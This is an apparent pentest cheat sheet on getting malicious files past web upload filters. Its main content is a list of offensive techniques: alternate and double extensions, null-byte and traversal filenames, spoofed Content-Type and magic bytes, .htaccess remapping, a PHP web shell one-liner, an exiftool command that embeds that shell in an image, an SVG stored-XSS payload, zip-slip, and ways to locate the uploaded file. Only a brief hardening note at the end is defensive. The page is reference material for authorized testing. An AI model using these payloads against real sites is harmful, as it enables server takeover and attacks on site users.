โ† All cheat sheets

FILE-UPLOAD-BYPASS

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

Techniques to get a dangerous file past an upload filter on apps you are
authorized to test, aiming for code execution or stored XSS.

EXTENSION FILTER BYPASS#

PHP alt extensions:  .php3 .php4 .php5 .php7 .phtml .pht .phar .inc .pgif .phtm
ASP/.NET:            .asp .aspx .ascx .asa .cer .asmx .config .soap
JSP:                 .jsp .jspx .jsw .jsv .jspf
Case tricks:         shell.PhP  shell.pHtml
Double extension:    shell.php.jpg   shell.jpg.php   shell.php.               (trailing dot/space on Windows)
Null byte (legacy):  shell.php%00.jpg
Trailing chars:      shell.php%20  shell.php%0a  shell.php::$DATA (NTFS ADS)
Path in filename:    ../../shell.php  (directory traversal in the name field)

CONTENT-TYPE / MAGIC BYTE BYPASS#

- Change Content-Type header to image/png, image/jpeg, image/gif.
- Prepend real magic bytes so the file "is" an image + PHP after:
    GIF8;  then  <?php system($_GET['c']); ?>
    PNG header (\x89PNG\r\n\x1a\n) + payload
- Polyglot: valid JPEG/GIF with PHP in a comment/EXIF so getimagesize() passes:
    exiftool -Comment='<?php system($_GET["c"]); ?>' pic.jpg

.HTACCESS / CONFIG UPLOAD#

If you can upload .htaccess, re-map a benign extension to PHP, then upload shell.jpg:
    AddType application/x-httpd-php .jpg
    # or:  php_flag engine on
IIS: upload web.config to enable handler / run ASP in the folder.

IMAGE LIBRARY / SVG / XXE#

- SVG upload -> stored XSS:  <svg xmlns="..."><script>alert(document.domain)</script></svg>
- SVG -> SSRF/XXE if server renders/parses with a vulnerable XML lib.
- ImageTragick (CVE-2016-3714) via crafted MVG/MSL if ImageMagick processes it.
- ExifTool RCE (CVE-2021-22204) via crafted metadata on some stacks.

ZIP / ARCHIVE#

- Zip-slip: entries named ../../path to write outside the extract dir.
- Symlink in archive -> arbitrary read after extraction.

AFTER UPLOAD#

- Find the stored path (response, predictable dir /uploads/, date-based names).
- If randomized name but known dir, brute or trigger an error that leaks it.
- Race condition: request the file during the window before AV/rename runs.

HARDENING (blue-team note)#

Validate by content not extension, store outside webroot, randomize names,
serve with Content-Disposition: attachment, disable script execution in the
upload dir, and re-encode images server-side.